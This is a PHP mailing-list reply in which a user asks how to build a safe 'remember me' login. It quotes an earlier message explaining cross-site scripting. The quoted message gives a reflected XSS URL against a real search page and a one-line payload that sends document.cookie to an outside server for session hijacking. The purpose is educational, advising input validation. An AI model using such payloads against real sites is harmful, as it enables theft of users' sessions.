Thanks heaps John, So as a basic rule, having a uid and pwd stored as session variables is NOT the problem, but storing the uid and/or pwd in a cookie on the browser is just plain asking for it :)
So, how do you implement a "remember me" safely? Setting JUST the uid in a cookie prevents people from knowing the pwd, but I have to validate the user before granting access to pages... without a pwd, it seems, errrr, impossible :) Justin > Just search google for Cross Site Scripting and you'll find a ton of > articles about that specifically. It all comes down to validating user > input and not displaying it directly back to the screen. > > Here is a link, for example, that'll pop up your cookies for cnn.com. > (watch the wrapping!) > > http://cnn.looksmart.com/r_search?l&izch&qc=&col=cnni&qm=0&st=1&nh=10&rf > =1&venue=all&keyword=&qp=&search=0&key=%3Cscript%3Ealert%28%27Hi%27%29%3 > B%3C%2Fscript%3E > > Now, how about instead of just executing alert("Hi"), I do a > location.href='www.myserver.com?var='+document.cookie; and send myself > your cookie. Then I just simply make my cookie match yours, and poof, > I'm you. :) > > It all comes down to validating user input and never showing it directly > back to the browser/screen. > > Similar problems exist for variables you use in database queries... > > ---John Holmes... > -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
